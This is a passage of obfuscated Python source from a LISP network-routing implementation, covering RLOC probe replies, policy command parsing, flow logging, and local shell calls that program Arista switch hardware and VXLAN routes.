lprint ( " Received unsolicited {} from {}/{}, port {}" . format ( Ii1I11IiI1I1 , red ( Ooooo00o0 , False ) , red ( Ii1IIi1 ,
# I1Ii111
False ) , port ) )
return
if 56 - 56: iII111i . O0 + OoO0O00 - I1ii11iIi11i
if 37 - 37: Oo0Ooo
if 3 - 3: Oo0Ooo
if 73 - 73: i11iIiiIii / iII111i + O0 * I1IiiI * i1IIi
if 75 - 75: iIii1I11I1II1 / II111iiii / I1ii11iIi11i * I1ii11iIi11i + iIii1I11I1II1
if 16 - 16: I11i
if 55 - 55: OoO0O00
if 87 - 87: Ii1I - iII111i / O0 - o0oOOo0O0Ooo - iIii1I11I1II1 % Ii1I
for rloc , I111o0oooO00o0 , oOoooOOO0o0 in lisp_rloc_probe_list [ O0o00o000oO ] :
if ( lisp_i_am_rtr and rloc . translated_port != 0 and
rloc . translated_port != port ) : continue
if 47 - 47: iII111i * I1Ii111 % o0oOOo0O0Ooo / OoOoOO00 / OoO0O00 % OoO0O00
rloc . process_rloc_probe_reply ( nonce , I111o0oooO00o0 , oOoooOOO0o0 , hop_count , ttl )
if 43 - 43: Oo0Ooo
return
if 34 - 34: OoO0O00 . i1IIi + IiII * IiII
if 76 - 76: OOooOOo
if 54 - 54: O0 * II111iiii * OOooOOo
if 44 - 44: I1IiiI
if 66 - 66: o0oOOo0O0Ooo
if 40 - 40: OOooOOo * Ii1I
if 38 - 38: ooOoO0o
if 5 - 5: OoooooooOO + iII111i - I11i
def lisp_db_list_length ( ) :
OoO = 0
for o00o0oOo0o0O in lisp_db_list :
OoO += len ( o00o0oOo0o0O . dynamic_eids ) if o00o0oOo0o0O . dynamic_eid_configured ( ) else 1
OoO += len ( o00o0oOo0o0O . eid . iid_list )
if 95 - 95: OOooOOo / i11iIiiIii - Ii1I + I1ii11iIi11i
return ( OoO )
if 7 - 7: I1ii11iIi11i
if 37 - 37: O0 . II111iiii
if 70 - 70: o0oOOo0O0Ooo / iII111i + i1IIi + I11i % iIii1I11I1II1 % Oo0Ooo
if 1 - 1: O0 + OoO0O00 . i11iIiiIii + I1Ii111 - OoO0O00 - IiII
if 1 - 1: I1ii11iIi11i / i1IIi . I1IiiI / Ii1I
if 19 - 19: iIii1I11I1II1 / Oo0Ooo . O0 - Oo0Ooo
if 74 - 74: I1ii11iIi11i * OoooooooOO . iII111i
if 45 - 45: I1IiiI - IiII % ooOoO0o - IiII . Oo0Ooo - o0oOOo0O0Ooo
def lisp_is_myeid ( eid ) :
for o00o0oOo0o0O in lisp_db_list :
if ( eid . is_more_specific ( o00o0oOo0o0O . eid ) ) : return ( True )
if 27 - 27: iII111i
return ( False )
if 64 - 64: iIii1I11I1II1 - OOooOOo . iII111i % o0oOOo0O0Ooo / II111iiii % OoooooooOO
if 87 - 87: OoooooooOO
if 70 - 70: o0oOOo0O0Ooo % OoooooooOO % I1IiiI . OoOoOO00 * I1IiiI - ooOoO0o
if 92 - 92: I1IiiI . I11i
if 66 - 66: I1Ii111 / I11i / OoooooooOO % OoOoOO00 . oO0o * iII111i
if 34 - 34: I1ii11iIi11i * I1ii11iIi11i % I11i / OOooOOo % oO0o . OoOoOO00
if 25 - 25: I1ii11iIi11i / I11i + i1IIi . I1IiiI + ooOoO0o
if 29 - 29: IiII + I1ii11iIi11i
if 8 - 8: IiII % I1IiiI
def lisp_format_macs ( sa , da ) :
sa = sa [ 0 : 4 ] + "-" + sa [ 4 : 8 ] + "-" + sa [ 8 : 12 ]
da = da [ 0 : 4 ] + "-" + da [ 4 : 8 ] + "-" + da [ 8 : 12 ]
return ( "{} -> {}" . format ( sa , da ) )
if 10 - 10: OoooooooOO / OoOoOO00
if 77 - 77: OoOoOO00
if 10 - 10: IiII / i11iIiiIii
if 19 - 19: OoO0O00
if 100 - 100: I1ii11iIi11i - I1ii11iIi11i
if 38 - 38: I1Ii111
if 23 - 23: Ii1I . I1ii11iIi11i + I1Ii111 + i1IIi * o0oOOo0O0Ooo - i11iIiiIii
def lisp_get_echo_nonce ( rloc , rloc_str ) :
if ( lisp_nonce_echoing == False ) : return ( None )
if 92 - 92: I1Ii111 - I1IiiI + Ii1I / iII111i % OOooOOo
if ( rloc ) : rloc_str = rloc . print_address_no_iid ( )
oOo0ooO0O0oo = None
if ( lisp_nonce_echo_list . has_key ( rloc_str ) ) :
oOo0ooO0O0oo = lisp_nonce_echo_list [ rloc_str ]
if 32 - 32: i1IIi . iII111i - Ii1I % iII111i % II111iiii - oO0o
return ( oOo0ooO0O0oo )
if 36 - 36: OoooooooOO * OoooooooOO . ooOoO0o . O0
if 5 - 5: I11i % I1IiiI - OoO0O00 . Oo0Ooo
if 79 - 79: iII111i + IiII % I11i . Oo0Ooo / IiII * iII111i
if 40 - 40: iII111i - I1IiiI + OoOoOO00
if 2 - 2: I11i - II111iiii / I1Ii111
if 27 - 27: OoO0O00 - I1ii11iIi11i * i11iIiiIii + Oo0Ooo
if 29 - 29: I1ii11iIi11i / IiII . I1Ii111 + Ii1I + OoO0O00
if 76 - 76: ooOoO0o . I11i * OoO0O00
def lisp_decode_dist_name ( packet ) :
OoO = 0
OooO = ""
if 89 - 89: o0oOOo0O0Ooo - OOooOOo * I1Ii111 . i1IIi % I1IiiI . I11i
while ( packet [ 0 : 1 ] != "\0" ) :
if ( OoO == 255 ) : return ( [ None , None ] )
OooO += packet [ 0 : 1 ]
packet = packet [ 1 : : ]
OoO += 1
if 99 - 99: I1Ii111 * ooOoO0o
if 9 - 9: I1Ii111
packet = packet [ 1 : : ]
return ( packet , OooO )
if 26 - 26: iIii1I11I1II1 - I11i . Oo0Ooo - I1Ii111
if 3 - 3: I1IiiI + I1ii11iIi11i - I11i
if 15 - 15: OoOoOO00 . Oo0Ooo / ooOoO0o + Oo0Ooo - OoooooooOO - o0oOOo0O0Ooo
if 64 - 64: OOooOOo
if 44 - 44: O0 % ooOoO0o - iIii1I11I1II1 * i11iIiiIii . OoOoOO00
if 32 - 32: I1ii11iIi11i - iII111i
if 34 - 34: OOooOOo . i1IIi * o0oOOo0O0Ooo - I1Ii111 + I1ii11iIi11i
if 32 - 32: i11iIiiIii . I1Ii111
def lisp_write_flow_log ( flow_log ) :
iI1IiI11Ii11i = open ( "./logs/lisp-flow.log" , "a" )
if 38 - 38: O0
OoO = 0
for iiIiIIIIiI in flow_log :
ii1i1II = iiIiIIIIiI [ 3 ]
IiIIi11i1I1iI = ii1i1II . print_flow ( iiIiIIIIiI [ 0 ] , iiIiIIIIiI [ 1 ] , iiIiIIIIiI [ 2 ] )
iI1IiI11Ii11i . write ( IiIIi11i1I1iI )
OoO += 1
if 15 - 15: o0oOOo0O0Ooo / Ii1I + Ii1I
iI1IiI11Ii11i . close ( )
del ( flow_log )
if 59 - 59: II111iiii - o0oOOo0O0Ooo * OoooooooOO
OoO = bold ( str ( OoO ) , False )
lprint ( "Wrote {} flow entries to ./logs/lisp-flow.log" . format ( OoO ) )
return
if 83 - 83: oO0o . iIii1I11I1II1 . iII111i % Oo0Ooo
if 48 - 48: oO0o % OoO0O00 - OoooooooOO . IiII
if 11 - 11: I1Ii111 % o0oOOo0O0Ooo - o0oOOo0O0Ooo % OoooooooOO . o0oOOo0O0Ooo - I1ii11iIi11i
if 33 - 33: OoO0O00 + II111iiii . Oo0Ooo * I1Ii111
if 63 - 63: OoooooooOO + OoOoOO00 - OoooooooOO
if 54 - 54: OoO0O00 + I1IiiI % O0 + OoO0O00
if 37 - 37: II111iiii / I1ii11iIi11i * I1IiiI - OoooooooOO
def lisp_policy_command ( kv_pair ) :
iIiiI11II11 = lisp_policy ( "" )
O000i11II11I = None
if 43 - 43: iIii1I11I1II1
i1iI11i = [ ]
for i1i1IIIIIIIi in range ( len ( kv_pair [ "datetime-range" ] ) ) :
i1iI11i . append ( lisp_policy_match ( ) )
if 89 - 89: I11i + iII111i / i11iIiiIii
if 46 - 46: ooOoO0o + ooOoO0o / IiII
for oOO0ooo in kv_pair . keys ( ) :
Oooo0oOOO0 = kv_pair [ oOO0ooo ]
if 7 - 7: i11iIiiIii - i11iIiiIii % OoOoOO00 . I11i % i1IIi - Oo0Ooo
if 84 - 84: I11i . o0oOOo0O0Ooo / ooOoO0o + OoooooooOO
if 83 - 83: Oo0Ooo / i1IIi * O0 % OoOoOO00 * OoOoOO00 + i1IIi
if 66 - 66: O0 % o0oOOo0O0Ooo . oO0o * i11iIiiIii + Oo0Ooo
if ( oOO0ooo == "instance-id" ) :
for i1i1IIIIIIIi in range ( len ( i1iI11i ) ) :
IIoOo0000oooooo = Oooo0oOOO0 [ i1i1IIIIIIIi ]
if ( IIoOo0000oooooo == "" ) : continue
o0o0oO00O00OO = i1iI11i [ i1i1IIIIIIIi ]
if ( o0o0oO00O00OO . source_eid == None ) :
o0o0oO00O00OO . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 80 - 80: iIii1I11I1II1
if ( o0o0oO00O00OO . dest_eid == None ) :
o0o0oO00O00OO . dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 41 - 41: I11i + I1IiiI + oO0o . Ii1I
o0o0oO00O00OO . source_eid . instance_id = int ( IIoOo0000oooooo )
o0o0oO00O00OO . dest_eid . instance_id = int ( IIoOo0000oooooo )
if 71 - 71: iIii1I11I1II1 / I1ii11iIi11i + OoooooooOO . ooOoO0o
if 63 - 63: i11iIiiIii % I1Ii111 % IiII * i1IIi + I1Ii111 + I1Ii111
if ( oOO0ooo == "source-eid" ) :
for i1i1IIIIIIIi in range ( len ( i1iI11i ) ) :
IIoOo0000oooooo = Oooo0oOOO0 [ i1i1IIIIIIIi ]
if ( IIoOo0000oooooo == "" ) : continue
o0o0oO00O00OO = i1iI11i [ i1i1IIIIIIIi ]
if ( o0o0oO00O00OO . source_eid == None ) :
o0o0oO00O00OO . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 51 - 51: iII111i / Ii1I . iII111i + O0 / IiII + OoooooooOO
oOo00Ooo0o0 = o0o0oO00O00OO . source_eid . instance_id
o0o0oO00O00OO . source_eid . store_prefix ( IIoOo0000oooooo )
o0o0oO00O00OO . source_eid . instance_id = oOo00Ooo0o0
if 29 - 29: I1IiiI - OOooOOo
if 83 - 83: OoOoOO00 * oO0o . OOooOOo - OoO0O00
if ( oOO0ooo == "destination-eid" ) :
for i1i1IIIIIIIi in range ( len ( i1iI11i ) ) :
IIoOo0000oooooo = Oooo0oOOO0 [ i1i1IIIIIIIi ]
if ( IIoOo0000oooooo == "" ) : continue
o0o0oO00O00OO = i1iI11i [ i1i1IIIIIIIi ]
if ( o0o0oO00O00OO . dest_eid == None ) :
o0o0oO00O00OO . dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 73 - 73: I1ii11iIi11i / iII111i / Oo0Ooo
oOo00Ooo0o0 = o0o0oO00O00OO . dest_eid . instance_id
o0o0oO00O00OO . dest_eid . store_prefix ( IIoOo0000oooooo )
o0o0oO00O00OO . dest_eid . instance_id = oOo00Ooo0o0
if 85 - 85: Ii1I
if 67 - 67: i11iIiiIii / II111iiii . i11iIiiIii * i11iIiiIii / ooOoO0o . oO0o
if ( oOO0ooo == "source-rloc" ) :
for i1i1IIIIIIIi in range ( len ( i1iI11i ) ) :
IIoOo0000oooooo = Oooo0oOOO0 [ i1i1IIIIIIIi ]
if ( IIoOo0000oooooo == "" ) : continue
o0o0oO00O00OO = i1iI11i [ i1i1IIIIIIIi ]
o0o0oO00O00OO . source_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
o0o0oO00O00OO . source_rloc . store_prefix ( IIoOo0000oooooo )
if 46 - 46: oO0o . OoO0O00 - iIii1I11I1II1 . IiII
if 52 - 52: i11iIiiIii / O0 + oO0o . I11i
if ( oOO0ooo == "destination-rloc" ) :
for i1i1IIIIIIIi in range ( len ( i1iI11i ) ) :
IIoOo0000oooooo = Oooo0oOOO0 [ i1i1IIIIIIIi ]
if ( IIoOo0000oooooo == "" ) : continue
o0o0oO00O00OO = i1iI11i [ i1i1IIIIIIIi ]
o0o0oO00O00OO . dest_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
o0o0oO00O00OO . dest_rloc . store_prefix ( IIoOo0000oooooo )
if 73 - 73: OoooooooOO / I1IiiI % Oo0Ooo . oO0o + OoooooooOO
if 84 - 84: I1ii11iIi11i - OOooOOo * II111iiii
if ( oOO0ooo == "rloc-record-name" ) :
for i1i1IIIIIIIi in range ( len ( i1iI11i ) ) :
IIoOo0000oooooo = Oooo0oOOO0 [ i1i1IIIIIIIi ]
if ( IIoOo0000oooooo == "" ) : continue
o0o0oO00O00OO = i1iI11i [ i1i1IIIIIIIi ]
o0o0oO00O00OO . rloc_record_name = IIoOo0000oooooo
if 28 - 28: I1ii11iIi11i . oO0o / o0oOOo0O0Ooo - iII111i
if 65 - 65: I1ii11iIi11i * OOooOOo * ooOoO0o + oO0o - OOooOOo
if ( oOO0ooo == "geo-name" ) :
for i1i1IIIIIIIi in range ( len ( i1iI11i ) ) :
IIoOo0000oooooo = Oooo0oOOO0 [ i1i1IIIIIIIi ]
if ( IIoOo0000oooooo == "" ) : continue
o0o0oO00O00OO = i1iI11i [ i1i1IIIIIIIi ]
o0o0oO00O00OO . geo_name = IIoOo0000oooooo
if 100 - 100: iII111i
if 12 - 12: OoooooooOO - I1ii11iIi11i * iII111i / ooOoO0o
if ( oOO0ooo == "elp-name" ) :
for i1i1IIIIIIIi in range ( len ( i1iI11i ) ) :
IIoOo0000oooooo = Oooo0oOOO0 [ i1i1IIIIIIIi ]
if ( IIoOo0000oooooo == "" ) : continue
o0o0oO00O00OO = i1iI11i [ i1i1IIIIIIIi ]
o0o0oO00O00OO . elp_name = IIoOo0000oooooo
if 99 - 99: I1ii11iIi11i + I11i
if 29 - 29: I1ii11iIi11i / oO0o
if ( oOO0ooo == "rle-name" ) :
for i1i1IIIIIIIi in range ( len ( i1iI11i ) ) :
IIoOo0000oooooo = Oooo0oOOO0 [ i1i1IIIIIIIi ]
if ( IIoOo0000oooooo == "" ) : continue
o0o0oO00O00OO = i1iI11i [ i1i1IIIIIIIi ]
o0o0oO00O00OO . rle_name = IIoOo0000oooooo
if 2 - 2: Oo0Ooo / IiII - OoooooooOO
if 65 - 65: OoO0O00 - Ii1I
if ( oOO0ooo == "json-name" ) :
for i1i1IIIIIIIi in range ( len ( i1iI11i ) ) :
IIoOo0000oooooo = Oooo0oOOO0 [ i1i1IIIIIIIi ]
if ( IIoOo0000oooooo == "" ) : continue
o0o0oO00O00OO = i1iI11i [ i1i1IIIIIIIi ]
o0o0oO00O00OO . json_name = IIoOo0000oooooo
if 98 - 98: OoOoOO00 * I1Ii111 * iIii1I11I1II1 * OoOoOO00
if 15 - 15: Oo0Ooo
if ( oOO0ooo == "datetime-range" ) :
for i1i1IIIIIIIi in range ( len ( i1iI11i ) ) :
IIoOo0000oooooo = Oooo0oOOO0 [ i1i1IIIIIIIi ]
o0o0oO00O00OO = i1iI11i [ i1i1IIIIIIIi ]
if ( IIoOo0000oooooo == "" ) : continue
o0000oO = lisp_datetime ( IIoOo0000oooooo [ 0 : 19 ] )
I11I1i1 = lisp_datetime ( IIoOo0000oooooo [ 19 : : ] )
if ( o0000oO . valid_datetime ( ) and I11I1i1 . valid_datetime ( ) ) :
o0o0oO00O00OO . datetime_lower = o0000oO
o0o0oO00O00OO . datetime_upper = I11I1i1
if 100 - 100: IiII + I1ii11iIi11i + iII111i . i1IIi . I1ii11iIi11i / OoooooooOO
if 84 - 84: o0oOOo0O0Ooo * I11i
if 22 - 22: i1IIi + OOooOOo % OoooooooOO
if 34 - 34: oO0o / O0 - II111iiii % Oo0Ooo + I11i
if 23 - 23: o0oOOo0O0Ooo + i11iIiiIii . I1IiiI + iIii1I11I1II1
if 18 - 18: o0oOOo0O0Ooo . O0 + I1Ii111
if 66 - 66: OoooooooOO
if ( oOO0ooo == "set-action" ) :
iIiiI11II11 . set_action = Oooo0oOOO0
if 90 - 90: IiII - OoOoOO00
if ( oOO0ooo == "set-record-ttl" ) :
iIiiI11II11 . set_record_ttl = int ( Oooo0oOOO0 )
if 98 - 98: Oo0Ooo / oO0o . Ii1I
if ( oOO0ooo == "set-instance-id" ) :
if ( iIiiI11II11 . set_source_eid == None ) :
iIiiI11II11 . set_source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 56 - 56: ooOoO0o % OoO0O00 * i11iIiiIii % IiII % I1IiiI - oO0o
if ( iIiiI11II11 . set_dest_eid == None ) :
iIiiI11II11 . set_dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 37 - 37: iII111i - Ii1I . oO0o
O000i11II11I = int ( Oooo0oOOO0 )
iIiiI11II11 . set_source_eid . instance_id = O000i11II11I
iIiiI11II11 . set_dest_eid . instance_id = O000i11II11I
if 47 - 47: IiII / I1ii11iIi11i . o0oOOo0O0Ooo . ooOoO0o + OOooOOo . OOooOOo
if ( oOO0ooo == "set-source-eid" ) :
if ( iIiiI11II11 . set_source_eid == None ) :
iIiiI11II11 . set_source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 25 - 25: oO0o
iIiiI11II11 . set_source_eid . store_prefix ( Oooo0oOOO0 )
if ( O000i11II11I != None ) : iIiiI11II11 . set_source_eid . instance_id = O000i11II11I
if 43 - 43: Ii1I - o0oOOo0O0Ooo % oO0o - O0
if ( oOO0ooo == "set-destination-eid" ) :
if ( iIiiI11II11 . set_dest_eid == None ) :
iIiiI11II11 . set_dest_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 20 - 20: OoO0O00 . ooOoO0o / OoOoOO00 - OoOoOO00 . iII111i / OOooOOo
iIiiI11II11 . set_dest_eid . store_prefix ( Oooo0oOOO0 )
if ( O000i11II11I != None ) : iIiiI11II11 . set_dest_eid . instance_id = O000i11II11I
if 39 - 39: iIii1I11I1II1 % ooOoO0o
if ( oOO0ooo == "set-rloc-address" ) :
iIiiI11II11 . set_rloc_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
iIiiI11II11 . set_rloc_address . store_address ( Oooo0oOOO0 )
if 75 - 75: i1IIi * II111iiii * O0 * i11iIiiIii % iII111i / iII111i
if ( oOO0ooo == "set-rloc-record-name" ) :
iIiiI11II11 . set_rloc_record_name = Oooo0oOOO0
if 36 - 36: IiII / I1IiiI % iII111i / iII111i
if ( oOO0ooo == "set-elp-name" ) :
iIiiI11II11 . set_elp_name = Oooo0oOOO0
if 38 - 38: OOooOOo * I1ii11iIi11i * I1Ii111 + I11i
if ( oOO0ooo == "set-geo-name" ) :
iIiiI11II11 . set_geo_name = Oooo0oOOO0
if 65 - 65: O0 + O0 * I1Ii111
if ( oOO0ooo == "set-rle-name" ) :
iIiiI11II11 . set_rle_name = Oooo0oOOO0
if 66 - 66: OOooOOo / O0 + i1IIi . O0 % I1ii11iIi11i - OoooooooOO
if ( oOO0ooo == "set-json-name" ) :
iIiiI11II11 . set_json_name = Oooo0oOOO0
if 16 - 16: I11i % iII111i
if ( oOO0ooo == "policy-name" ) :
iIiiI11II11 . policy_name = Oooo0oOOO0
if 29 - 29: I1IiiI - ooOoO0o * OoO0O00 . i11iIiiIii % OoOoOO00 * o0oOOo0O0Ooo
if 43 - 43: OoO0O00 * OOooOOo / I1Ii111 % OoOoOO00 . oO0o / OOooOOo
if 62 - 62: O0 * I1ii11iIi11i - O0 / I11i % ooOoO0o
if 1 - 1: O0 / iIii1I11I1II1
if 17 - 17: OoOoOO00 + ooOoO0o * II111iiii * OoOoOO00 + I1IiiI + i11iIiiIii
if 46 - 46: i1IIi - II111iiii . I1IiiI . i11iIiiIii
iIiiI11II11 . match_clauses = i1iI11i
iIiiI11II11 . save_policy ( )
return
if 54 - 54: O0 * I1ii11iIi11i / OOooOOo / IiII * IiII
if 69 - 69: Oo0Ooo * OoooooooOO / I1IiiI
lisp_policy_commands = {
"lisp policy" : [ lisp_policy_command , {
"policy-name" : [ True ] ,
"match" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"source-eid" : [ True ] ,
"destination-eid" : [ True ] ,
"source-rloc" : [ True ] ,
"destination-rloc" : [ True ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"datetime-range" : [ True ] ,
"set-action" : [ False , "process" , "drop" ] ,
"set-record-ttl" : [ True , 0 , 0x7fffffff ] ,
"set-instance-id" : [ True , 0 , 0xffffffff ] ,
"set-source-eid" : [ True ] ,
"set-destination-eid" : [ True ] ,
"set-rloc-address" : [ True ] ,
"set-rloc-record-name" : [ True ] ,
"set-elp-name" : [ True ] ,
"set-geo-name" : [ True ] ,
"set-rle-name" : [ True ] ,
"set-json-name" : [ True ] } ]
}
if 16 - 16: o0oOOo0O0Ooo
if 3 - 3: i11iIiiIii . I1ii11iIi11i
if 65 - 65: II111iiii * iII111i - OoO0O00 + oO0o % OoO0O00
if 83 - 83: OoooooooOO % I1ii11iIi11i . IiII + OOooOOo . iII111i - ooOoO0o
if 100 - 100: o0oOOo0O0Ooo
if 95 - 95: iII111i * oO0o * i1IIi
if 100 - 100: iII111i . o0oOOo0O0Ooo - I1Ii111 % oO0o
def lisp_send_to_arista ( command , interface ) :
interface = "" if ( interface == None ) else "interface " + interface
if 11 - 11: o0oOOo0O0Ooo . OoooooooOO - i1IIi
oOoOOOo00oOOoO0 = command
if ( interface != "" ) : oOoOOOo00oOOoO0 = interface + ": " + oOoOOOo00oOOoO0
lprint ( "Send CLI command '{}' to hardware" . format ( oOoOOOo00oOOoO0 ) )
if 85 - 85: i11iIiiIii + O0 % I1Ii111 + I1Ii111 + iIii1I11I1II1
commands = '''
enable
configure
{}
{}
''' . format ( interface , command )
if 74 - 74: I11i
os . system ( "FastCli -c '{}'" . format ( commands ) )
return
if 92 - 92: OoOoOO00 + oO0o
if 89 - 89: IiII % iII111i / iIii1I11I1II1 . Ii1I . Oo0Ooo + ooOoO0o
if 28 - 28: I1IiiI . iIii1I11I1II1
if 12 - 12: I1Ii111 * OOooOOo
if 11 - 11: II111iiii % O0 % O0 % o0oOOo0O0Ooo
if 45 - 45: OoooooooOO * oO0o
if 74 - 74: ooOoO0o * I11i / oO0o - IiII + OoOoOO00
def lisp_arista_is_alive ( prefix ) :
OoOoOoo0OoO0 = "enable\nsh plat trident l3 software routes {}\n" . format ( prefix )
o0OooooOoOO = commands . getoutput ( "FastCli -c '{}'" . format ( OoOoOoo0OoO0 ) )
if 16 - 16: Oo0Ooo
if 29 - 29: Oo0Ooo . I1ii11iIi11i / II111iiii / oO0o / o0oOOo0O0Ooo + I11i
if 4 - 4: OoooooooOO % I1ii11iIi11i . OoO0O00 * o0oOOo0O0Ooo + I1ii11iIi11i * IiII
if 67 - 67: I1IiiI
o0OooooOoOO = o0OooooOoOO . split ( "\n" ) [ 1 ]
O0I11I = o0OooooOoOO . split ( " " )
O0I11I = O0I11I [ - 1 ] . replace ( "\r" , "" )
if 71 - 71: Ii1I % iIii1I11I1II1 + OoOoOO00
if 19 - 19: I1IiiI % I1IiiI / I1ii11iIi11i + iIii1I11I1II1 % iII111i / i11iIiiIii
if 30 - 30: i1IIi % o0oOOo0O0Ooo - I1ii11iIi11i
if 72 - 72: iIii1I11I1II1 + OOooOOo * ooOoO0o * O0 - I1IiiI
return ( O0I11I == "Y" )
if 36 - 36: I11i / II111iiii . oO0o - ooOoO0o % iII111i % OoOoOO00
if 13 - 13: iIii1I11I1II1 - Oo0Ooo % IiII / iII111i - I1Ii111
if 46 - 46: OoO0O00 / iII111i
if 21 - 21: iIii1I11I1II1 / I1Ii111 * I1ii11iIi11i / Oo0Ooo . Oo0Ooo
if 2 - 2: Oo0Ooo + i11iIiiIii . I1ii11iIi11i * I1Ii111
if 22 - 22: I1ii11iIi11i . i1IIi + I1ii11iIi11i / OoooooooOO - i11iIiiIii / iIii1I11I1II1
if 96 - 96: o0oOOo0O0Ooo . I1Ii111 + Oo0Ooo . I11i + ooOoO0o
if 33 - 33: OoO0O00 / OOooOOo % Oo0Ooo . o0oOOo0O0Ooo % II111iiii
if 62 - 62: iII111i . OoooooooOO - i1IIi
if 59 - 59: OoOoOO00 + i1IIi * OoooooooOO . oO0o
if 38 - 38: I1ii11iIi11i / o0oOOo0O0Ooo
if 95 - 95: iIii1I11I1II1 / OoOoOO00 % I1Ii111
if 54 - 54: OoooooooOO % Ii1I
if 100 - 100: OOooOOo - I11i . O0 * i1IIi % OoooooooOO - ooOoO0o
if 54 - 54: O0 + I11i
if 71 - 71: OoOoOO00
if 29 - 29: O0 . i11iIiiIii
if 51 - 51: IiII
if 53 - 53: O0
if 19 - 19: o0oOOo0O0Ooo / iII111i % OoOoOO00
if 65 - 65: o0oOOo0O0Ooo
if 89 - 89: iIii1I11I1II1 + OoooooooOO + i1IIi + OoooooooOO % IiII * OoO0O00
if 53 - 53: OOooOOo . IiII % I11i - OoO0O00 - Oo0Ooo
if 58 - 58: I1Ii111 / OoooooooOO . I11i % I1Ii111
if 8 - 8: Oo0Ooo % ooOoO0o / i11iIiiIii
if 54 - 54: IiII
if 85 - 85: OOooOOo - i1IIi
if 10 - 10: I1ii11iIi11i
if 3 - 3: ooOoO0o * O0 / o0oOOo0O0Ooo
if 22 - 22: OoOoOO00 + OOooOOo . iII111i % iIii1I11I1II1 - I11i
if 23 - 23: OoOoOO00 * I1Ii111
if 18 - 18: o0oOOo0O0Ooo % i11iIiiIii . Ii1I . O0
if 85 - 85: I1ii11iIi11i * iIii1I11I1II1 + o0oOOo0O0Ooo * OoO0O00
if 25 - 25: o0oOOo0O0Ooo / Ii1I / Oo0Ooo . ooOoO0o - ooOoO0o * O0
if 14 - 14: O0 - Ii1I + iIii1I11I1II1 + II111iiii . ooOoO0o + Ii1I
if 25 - 25: OoO0O00 * oO0o
if 29 - 29: OOooOOo - I1Ii111 - i11iIiiIii % i1IIi
if 2 - 2: i11iIiiIii % iIii1I11I1II1 * OOooOOo
if 45 - 45: oO0o + i1IIi + iII111i + o0oOOo0O0Ooo * OOooOOo + ooOoO0o
if 83 - 83: OoO0O00 - ooOoO0o / OoooooooOO % iIii1I11I1II1 - II111iiii
if 73 - 73: Oo0Ooo + II111iiii - IiII
if 60 - 60: i1IIi . i11iIiiIii / i1IIi . I11i % OOooOOo
if 47 - 47: oO0o + IiII * I1Ii111 % o0oOOo0O0Ooo - O0 % IiII
if 66 - 66: II111iiii * I1IiiI . Oo0Ooo * OoooooooOO % OoOoOO00 . II111iiii
def lisp_program_vxlan_hardware ( mc ) :
if 4 - 4: iII111i + I1Ii111 % OoOoOO00 / Ii1I
if 94 - 94: OoO0O00
if 35 - 35: I1ii11iIi11i % OoO0O00 + II111iiii % II111iiii / IiII - iII111i
if 9 - 9: I1ii11iIi11i * o0oOOo0O0Ooo . oO0o
if 48 - 48: IiII . I1Ii111 + OoooooooOO - I1Ii111 . Ii1I . I1Ii111
if 24 - 24: ooOoO0o * iIii1I11I1II1
if ( os . path . exists ( "/persist/local/lispers.net" ) == False ) : return
if 1 - 1: I1ii11iIi11i . O0
if 3 - 3: iIii1I11I1II1 * ooOoO0o - OoOoOO00 * I1ii11iIi11i % OoOoOO00 - OoooooooOO
if 42 - 42: I1Ii111 - i1IIi
if 91 - 91: iII111i . OOooOOo / iIii1I11I1II1 . Oo0Ooo . II111iiii . OoOoOO00
if ( len ( mc . best_rloc_set ) == 0 ) : return
if 31 - 31: OoO0O00 . I1ii11iIi11i % I11i - II111iiii
if 70 - 70: ooOoO0o - IiII - OoO0O00 / I11i
if 59 - 59: IiII % ooOoO0o . iII111i / Ii1I * Ii1I
if 73 - 73: I1ii11iIi11i . oO0o % I11i . I1ii11iIi11i / I1Ii111 / II111iiii
OOi1 = mc . eid . print_prefix_no_iid ( )
OooO0ooO0o0OO = mc . best_rloc_set [ 0 ] . rloc . print_address_no_iid ( )
if 23 - 23: OoooooooOO . o0oOOo0O0Ooo
if 76 - 76: I1Ii111
if 91 - 91: iIii1I11I1II1 / Ii1I . I1IiiI
if 63 - 63: ooOoO0o . Ii1I - I1Ii111 - oO0o * I1Ii111 + ooOoO0o
ooOoo0o = commands . getoutput ( "ip route get {} | egrep vlan4094" . format ( OOi1 ) )
if 44 - 44: OoooooooOO . i1IIi + Ii1I * O0 % i1IIi % I11i
if ( ooOoo0o != "" ) :
lprint ( "Route {} already in hardware: '{}'" . format ( green ( OOi1 , False ) , ooOoo0o ) )
if 98 - 98: I1IiiI - II111iiii % II111iiii % OOooOOo
return
if 6 - 6: OOooOOo
if 21 - 21: I1Ii111 - Ii1I - i1IIi % oO0o
if 55 - 55: OOooOOo + oO0o - II111iiii
if 5 - 5: iII111i * OoooooooOO . OoO0O00 % ooOoO0o + Ii1I
if 59 - 59: OoOoOO00
if 96 - 96: I1IiiI
if 3 - 3: OoooooooOO
I11ii1iIi111i = commands . getoutput ( "ifconfig | egrep 'vxlan|vlan4094'" )
if ( I11ii1iIi111i . find ( "vxlan" ) == - 1 ) :
lprint ( "No VXLAN interface found, cannot program hardware" )
return
if 96 - 96: IiII
if ( I11ii1iIi111i . find ( "vlan4094" ) == - 1 ) :
lprint ( "No vlan4094 interface found, cannot program hardware" )
return
if 55 - 55: iIii1I11I1II1 + II111iiii . I1ii11iIi11i + Oo0Ooo . Ii1I * IiII
ooO0O = commands . getoutput ( "ip addr | egrep vlan4094 | egrep inet" )
if ( ooO0O == "" ) :
lprint ( "No IP address found on vlan4094, cannot program hardware" )
return
if 92 - 92: OoOoOO00 . I1IiiI - ooOoO0o / OoooooooOO
ooO0O = ooO0O . split ( "inet " ) [ 1 ]
